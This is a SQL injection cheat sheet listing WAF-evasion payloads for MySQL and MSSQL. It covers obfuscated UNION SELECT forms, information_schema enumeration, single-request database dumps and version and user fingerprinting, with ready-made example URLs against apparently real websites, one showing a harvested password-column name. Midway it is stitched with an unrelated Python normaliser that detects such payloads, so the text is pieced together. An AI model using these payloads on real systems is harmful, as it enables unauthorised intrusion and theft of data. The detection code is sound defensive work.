- SQL INJECTION WAF Bypass [RedBird Offensive Security]
- WAF evasion methods for SQL injection
- I want to share WAF evasion methods for SQL injections. Most are old but a few are newer. You can bypass most of the "404 forbidden" and "Not Acceptable" errors using these methods.
- -------------------------------------------------------------------------------------------------------------------------------
- 1) id=1+UnIoN+SeLecT 1,2,3 --+
- 2) id=1+UnIOn/**/SeLect 1,2,3 --+
- 3) id=1+UNIunionON+SELselectECT 1,2,3 --+
- 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+
- 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+
- 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+
- 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+
- 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+
- 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
- div+0
- Having+1=0
- AND+1=0
- /*!and*/+1=0
- and(1)=(0)
- Or false the URL query:
- id=-1 union all select
- id=null union all select
- id=1+and+false+union+all+select
- id=9999 union all select
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- http://www.xxx.com/project.php?cat=Conservation'+and(1)=(0)+union+distinct+select+1
- and use `and 1=0` to make the column number appear in the page
- or
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- Hard WAF bypass tips
- Whitespaces:
- union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
- %0Aunion%0Aselect%0A1,2,3--
- /**/union/**/select/**/1,2,3--
- Example:
- http://www.xxx.com/list_itinerary.php?id=-4%20union%20%28select%201,2,version%28%29,4,5,6,7,8%29%20--
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- NICE QUERY
- www.xxx.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+
- www.xxx.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Bypassing:
- (Double Keyword): UNIunionON+SELselectECT
- +union+distinct+select+
- +union+distinctROW+select+
- union+/*!select*/+1,2,3
- union/**/select/**/1,2,3
- uni<on all sel<ect
- %20union%20/*!select*/%20
- /**//*!union*//**//*!select*//**/
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- +%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
- id=1+’UnI”On’+'SeL”ECT’ <- MySQL only
- id=1+'UnI'||'on'+SeLeCT' <- MSSQL only
- Example:
- http://www.xxx.com/list_itinerary.php?id=-4%20union%23aa%0Aselect%201,2,version%28%29,4,5,6,7,8%20--
- http://www.xxx.com/list_itinerary.php?id=-4%20/**/union/*!50000select*/%201,2,version%28%29,4,5,6,7,8%20--
- http://www.xxx.com/list_itinerary.php?id=-4%20/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/%201,2,version%28%29,4,5,6,7,8%20--
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- After the id number, like id=1+/*!and*/+1=0:
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- False the URL query:
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- id=-1 union all select
- id=null union all select
- id=1+and+false+union+all+select
- id=9999 union all select
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Order bypassing, do it like this:
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- /*!table_name*/+from /*!information_schema*/./*!tables*/ where table_schema=database()
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
- Example:
- http://www.westbury.com/article.php?article_id=-117%20union%20select%201,2,unhex%28hex%28Concat%28Column_Name,0x3e,Table_schema,0x3e,table_Name%29%29%29,4,5,6,7/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char%2837,%20112,%2097,%20115,%20115,%2037%29--
- Result: user_passwd>westbur6_website>user_info
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Used with order:
- convert(... using ascii) or unhex(hex(...))
- Example:
- www.westbury.com/article.php?article_id=-117 union select 1,2,convert(group_concat(table_name) using ascii),4,5,6,7+from+information_schema.tables--
- If 'ascii' doesn't work, you can try one of these character sets:
- ujis
- ucs2
- tis620
- swe7
- sjis
- macroman
- macce
- latin7
- latin5
- latin2
- koi8u
- koi8r
- keybcs2
- hp8
- geostd8
- gbk
- gb2312
- armscii8
- ascii
- binary
- cp1250
- big5
- cp1251
- cp1256
- cp1257
- cp850
- ------------------------------Best Bypass WAF------------------------------------
- [~] order by [~]
- /**/ORDER/**/BY/**/
- /*!order*/+/*!by*/
- /*!ORDER BY*/
- /*!50000ORDER BY*/
- /*!50000ORDER*//**//*!50000BY*/
- /*!12345ORDER*/+/*!BY*/
- [~] UNION select [~]
- /*!50000%55nIoN*/ /*!50000%53eLeCt*/
- %55nion(%53elect 1,2,3)-- -
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/UNION/**//*!50000SELECT*//**/
- /*!50000UniON SeLeCt*/
- union /*!50000%53elect*/
- + #?uNiOn + #?sEleCt
- + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
- /*!%55NiOn*/ /*!%53eLEct*/
- /*!u%6eion*/ /*!se%6cect*/
- +un/**/ion+se/**/lect
- uni%0bon+se%0blect
- %2f**%2funion%2f**%2fselect
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- REVERSE(noinu)+REVERSE(tceles)
- /*--*/union/*--*/select/*--*/
- union (/*!/**/ SeleCT */ 1,2,3)
- /*!union*/+/*!select*/
- union+/*!select*/
- /**/union/**/select/**/
- /**/uNIon/**/sEleCt/**/
- +%2F**/+Union/*!select*/
- /**//*!union*//**//*!select*//**/
- /*!uNIOn*/ /*!SelECt*/
- +union+distinct+select+
- +union+distinctROW+select+
- uNiOn aLl sElEcT
- UNIunionON+SELselectECT
- /**/union/*!50000select*//**/
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- %55nion/**/%53elect
- uni<on all sel<ect
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*--*//*!all*//*--*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- union+sel%0bect
- +uni*on+sel*ect+
- +#1q%0Aunion all#qa%0A#%0Aselect
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- %23xyz%0AUnIOn%23xyz%0ASeLecT+
- %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
- union(select(1),2,3)
- union (select 1111,2222,3333)
- uNioN (/*!/**/ SeleCT */ 11)
- union (select 1111,2222,3333)
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
- %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
- +%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
- +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C
- /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
- +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLecT+
- /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
- /union\sselect/g
- /union\s+select/i
- /*!UnIoN*/SeLeCT
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +uni>on+sel>ect+
- +(UnIoN)+(SelECT)+
- +(UnI)(oN)+(SeL)(EcT)
- +’UnI”On’+'SeL”ECT’
- +uni on+sel ect+
- +/*!UnIoN*/+/*!SeLeCt*/+
- /*!u%6eion*/ /*!se%6cect*/
- uni%20union%20/*!select*/%20
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /^.*union.*$/ /^.*select.*$/
- /*union*/union/*select*/select+
- /*uni X on*/union/*sel X ect*/
- +un/**/ion+sel/**/ect+
- +UnIOn%0d%0aSeleCt%0d%0a
- UNION/*&test=1*/SELECT/*&pwn=2*/
- un?<ion sel<ect
- +un/**/ion+se/**/lect+
- +UNunionION+SEselectLECT+
- +uni%0bon+se%0blect+
- %252f%252a*/union%252f%252a /select%252f%252a*/
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f**%2funion%2f**%2fselect%2f**%2f
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- /*!UnIoN*/SeLecT+
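The patterns quoted in the list above (`/union\s+select/i`, `/^.*union.*$/` and the like) are what most of these spellings are built to slip past. As an added example that is not part of the original paste, here is a defender-side normaliser in Python: it URL-decodes (repeatedly, for the %252f double encoding), strips MySQL comments and the whitespace bytes MySQL accepts, re-applies a UNION ... SELECT rule, and also checks what a delete-the-keyword filter would leave behind. The sample payloads are constructed from the obfuscations listed above.

```python
import re
import urllib.parse

# A naive signature of the kind the list above is built to get past.
NAIVE_RULE = re.compile(r"union\s+select", re.IGNORECASE)
# Alternation applied left to right: whichever construct starts first wins, as in MySQL's lexer.
NOISE = re.compile(
    r"/\*!\d{0,5}"          # /*!50000 version-comment opener: keep its body
    r"|/\*.*?\*/"           # ordinary block comment, including the /**/ splitter
    r"|\*/"                 # closer left behind by a version comment
    r"|#[^\n]*\n?"          # hash comment to end of line
    r"|--[ \t][^\n]*\n?"    # dash comment to end of line
    r"|[\s\x0b\x0c\xa0]+",  # every whitespace byte MySQL accepts (%09-%0D, %A0)
    re.DOTALL,
)
UNION_SELECT = re.compile(r"\bunion\b[\s(]*(?:all|distinct(?:row)?)?[\s(]*\bselect\b")

def normalize(payload: str) -> str:
    """URL-decode repeatedly (%252f double encoding), collapse comments and
    odd whitespace to one space, lower-case the result."""
    s = payload
    for _ in range(3):
        decoded = urllib.parse.unquote_plus(s)  # also turns '+' into a space
        if decoded == s:
            break
        s = decoded
    return " ".join(NOISE.sub(" ", s).split()).lower()

def is_union_select(payload: str) -> bool:
    """Match UNION ... SELECT on the normalized text, and also on what a
    delete-the-keyword filter would leave behind (UNIunionON -> UNION)."""
    s = normalize(payload)
    stripped = re.sub(r"union|select", "", s)
    return bool(UNION_SELECT.search(s) or UNION_SELECT.search(stripped))

# Constructed samples, one per obfuscation from the lists above, plus controls.
SAMPLES = [
    "id=1+UnIoN+SeLecT 1,2,3 --+",                                   # mixed case, '+' spaces
    "id=1+UNIunionON+SELselectECT 1,2,3 --+",                        # doubled keyword
    "id=1 /*!50000%55nIoN*/ /*!50000%53eLeCt*/ 1,2,3",               # version comment + %55
    "id=-4%20union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C3",  # hash comments + CRLF
    "id=1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,3",      # double URL encoding
    "id=1 uNioN (/*!/**/ SeleCT */ 11)",                             # parentheses + comments
    "id=-1 union select 1,2,3",                                      # plain: naive rule works
    "id=42 ORDER BY name",                                           # benign control
]

def evaluate():  # returns (naive_hits, normalized_hits) as parallel lists over SAMPLES
    return ([bool(NAIVE_RULE.search(p)) for p in SAMPLES],
            [is_union_select(p) for p in SAMPLES])
```

The naive rule fires on only the plain sample; the normalised rule fires on every injected sample and stays quiet on the benign one, which is the argument for normalising input before matching rather than adding more spellings to a blocklist.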
- [~] information_schema.tables [~]
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
- /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
- /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
- [~] concat() [~]
- CoNcAt()
- concat()
- CON%08CAT()
- CoNcAt()
- %0AcOnCat()
- /**//*!12345cOnCat*/
- /*!50000cOnCat*/(/*!*/)
- unhex(hex(concat(table_name)))
- unhex(hex(/*!12345concat*/(table_name)))
- unhex(hex(/*!50000concat*/(table_name)))
- [~] group_concat() [~]
- /*!group_concat*/()
- gRoUp_cOnCAt()
- group_concat(/*!*/)
- group_concat(/*!12345table_name*/)
- group_concat(/*!50000table_name*/)
- /*!group_concat*/(/*!12345table_name*/)
- /*!group_concat*/(/*!50000table_name*/)
- /*!12345group_concat*/(/*!12345table_name*/)
- /*!50000group_concat*/(/*!50000table_name*/)
- /*!GrOuP_ConCaT*/()
- /*!12345GroUP_ConCat*/()
- /*!50000gRouP_cOnCaT*/()
- /*!50000Gr%6fuP_c%6fnCAT*/()
- unhex(hex(group_concat(table_name)))
- unhex(hex(/*!group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(table_name)))
- unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
- unhex(hex(/*!50000group_concat*/(table_name)))
- unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
- unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
- convert(group_concat(table_name)+using+ascii)
- convert(group_concat(/*!table_name*/)+using+ascii)
- convert(group_concat(/*!12345table_name*/)+using+ascii)
- convert(group_concat(/*!50000table_name*/)+using+ascii)
- CONVERT(group_concat(table_name)+USING+latin1)
- CONVERT(group_concat(table_name)+USING+latin2)
- CONVERT(group_concat(table_name)+USING+latin3)
- CONVERT(group_concat(table_name)+USING+latin4)
- CONVERT(group_concat(table_name)+USING+latin5)
- Group_Concat
- group_concat()
- /*!group_concat*/()
- grOUp_ConCat(/*!*/,0x3e,/*!*/)
- group_concat(,0x3c62723e)
- g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
- CoNcAt()
- CONCAT(DISTINCT Version())
- concat(,0x3a,)
- concat%00()
- %00CoNcAt()
- /*!50000cOnCat*/(/*!Version()*/)
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/(,0x3a,)
- concat_ws()
- concat(0x3a,,0x3c62723e)
- /*!concat_ws(0x3a,)*/
- concat_ws(0x3a3a3a,version()
- CONCAT_WS(CHAR(32,58,32),version(),)
- REVERSE(tacnoc)
- binary(version())
- uncompress(compress(version()))
- aes_decrypt(aes_encrypt(version(),1),1)
- [~] after the id number, like id=1+/*!and*/+1=0 [~]
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- More character sets for convert(... using ...):
- cp852
- cp866
- cp932
- dec8
- euckr
- latin1
- utf8
- Trick to make the info appear inside an img tag
- concat(0x223e3c62723e,,0x3c696d67207372633d22)
- When the column is output inside an HTML tag, but it is not always inside an img tag; it could be <a> or </noscript> or anything.
- Example:
- http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+
- [DUMP DB in 1 Request]
- (select(@) from (select(@:=0x00),(select(@) from (information_schema.columns) where (table_schema>=@) and (@) in (@:=concat(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
- (select(@) from (select(@:=0x00),(select(@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
- [DUMP DB in 1 Request improve]
- (select(@x) from (select(@x:=0x00),(select(0) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
- Example:
- http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
- Whitespace bypass:
- %09 %0A %0B %0C %0D %A0
- Get version, DB_NAME, user, HOST_NAME, datadir
- version()
- convert(version() using latin1)
- unhex(hex(version()))
- @@GLOBAL.VERSION
- (substr(@@version,1,1)=5) :: 1 = true, 0 = false
- # example #
- www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 --
- 1 means version 5 and 0 means version 4
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- # example #
- www.marinaplast.com/page.php?id=13+and substring(version(),1,1)=5
- page loads fine: version 5
- www.marinaplast.com/page.php?id=13+and substring(version(),1,1)=4
- page does not load fine: not version 4
- version 5
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- # example #
- www.marinaplast.com/page.php?id=13 /*!50095aaaa*/ no error: v5
- version 4
- id=1 /*!40123 1=1*/--+- no error
- id=1 /*!40122rrrr*/ no error
- # example #
- www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error: not v4
- ☆¸.•*☆ ☆*•.¸☆
- DB_NAME()
- @@database
- database()
- id=vv()
- # example #
- www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 --
- www.marinaplast.com/page.php?id=vv()
- ☆¸.•*☆ ☆*•.¸☆
- @@user
- user()
- user_name()
- system_user()
- # example #
- www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- HOST_NAME()
- @@hostname
- @@servername
- SERVERPROPERTY()
- # example #
- www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- @@datadir
- datadir()
- # example #
- www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- ASPX
- and 1=0/@@version
- ' and 1=0/@@version;--
- ) and 1=@@version--
- and 1=0/user;--